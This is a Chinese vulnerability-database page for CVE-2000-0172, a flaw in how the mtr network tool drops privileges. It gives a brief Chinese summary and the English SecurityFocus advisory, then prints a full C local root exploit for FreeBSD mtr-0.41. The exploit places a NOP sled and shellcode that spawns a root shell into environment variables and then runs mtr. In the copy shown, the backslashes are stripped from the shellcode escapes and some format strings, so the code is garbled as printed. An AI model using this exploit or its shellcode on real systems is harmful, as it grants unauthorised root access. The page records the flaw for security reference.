多个供应商mtr漏洞

多个供应商mtr漏洞

漏洞ID 1105734 漏洞类型 边界条件错误
发布时间 2000-03-03 更新时间 2005-05-02
图片[1]-多个供应商mtr漏洞-安全小百科CVE编号 CVE-2000-0172
图片[2]-多个供应商mtr漏洞-安全小百科CNNVD-ID CNNVD-200003-009
漏洞平台 Multiple CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19796
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200003-009
|漏洞详情
mtr程序在尝试放弃特权时只使用一个seteuid调用。本地用户利用此漏洞可以提升根特权。
|漏洞EXP
source: http://www.securityfocus.com/bid/1038/info

A potential vulnerability exists in the 'mtr' program, by Matt Kimball and Roger Wolff. Versions prior to 0.42 incorrectly dropped privileges on all Unix variants except HPUX. By calling a seteuid(getuid()) call, the authors hoped to drop permissions to prevent the obtaining of root privilege should there be potential vulnerabilities in mtr or a library it depends on. However, due to saved uid semantics, the uid of 0 can be recovered simply by doing a setuid(0). An attacker would only need to find an overflow in one of the libraries mtr uses, such as gtk or curses. In patched versions, the seteuid() call has been changed to setuid(). This will eliminate this potential problem.

/* (c) 2000 babcia padlina / buffer0verfl0w security (www.b0f.com) */
/* freebsd mtr-0.41 local root exploit */

#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h> 
#include <string.h>   

#define NOP             0x90
#define BUFSIZE         10000
#define ADDRS           1200 

long getesp(void)
{
   __asm__("movl %esp, %eaxn");
}

int main(argc, argv)
int argc; 
char **argv;
{
        char *execshell =
        //seteuid(0);
        "x31xdbxb8xb7xaaxaaxaax25xb7x55x55x55x53x53xcdx80"
        //setuid(0);
        "x31xdbxb8x17xaaxaaxaax25x17x55x55x55x53x53xcdx80"
        //execl("/bin/sh", "sh", 0);
        "xebx23x5ex8dx1ex89x5ex0bx31xd2x89x56x07x89x56x0f"
        "x89x56x14x88x56x19x31xc0xb0x3bx8dx4ex0bx89xcax52"
        "x51x53x50xebx18xe8xd8xffxffxff/bin/shx01x01x01x01"
        "x02x02x02x02x03x03x03x03x9ax04x04x04x04x07x04";

        char buf[BUFSIZE+ADDRS+1], *p;
        int noplen, i, ofs;
        long ret, *ap;
   
        if (argc < 2) { fprintf(stderr, "usage: %s ofsn", argv[0]); exit(0); }

        ofs = atoi(argv[1]);

        noplen = BUFSIZE - strlen(execshell);
        ret = getesp() + ofs;
        
        memset(buf, NOP, noplen);
        buf[noplen+1] = '';
        strcat(buf, execshell);
        
        setenv("EGG", buf, 1);
        
        p = buf;
        ap = (unsigned long *)p;
        
        for(i = 0; i < ADDRS / 4; i++)
                *ap++ = ret;
        
        p = (char *)ap;
        *p = '';
        
        fprintf(stderr, "ret: 0x%xn", ret);
        
        setenv("TERMCAP", buf, 1);
        execl("/usr/local/sbin/mtr", "mtr", 0);
        
        return 0;
}
|参考资料

来源:BID
名称:1038
链接:http://www.securityfocus.com/bid/1038

相关推荐: iMatix Xitami Administrator Plain Text Password Storage Vulnerability

iMatix Xitami Administrator Plain Text Password Storage Vulnerability 漏洞ID 1102719 漏洞类型 Configuration Error 发布时间 2001-11-26 更新时间 2…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享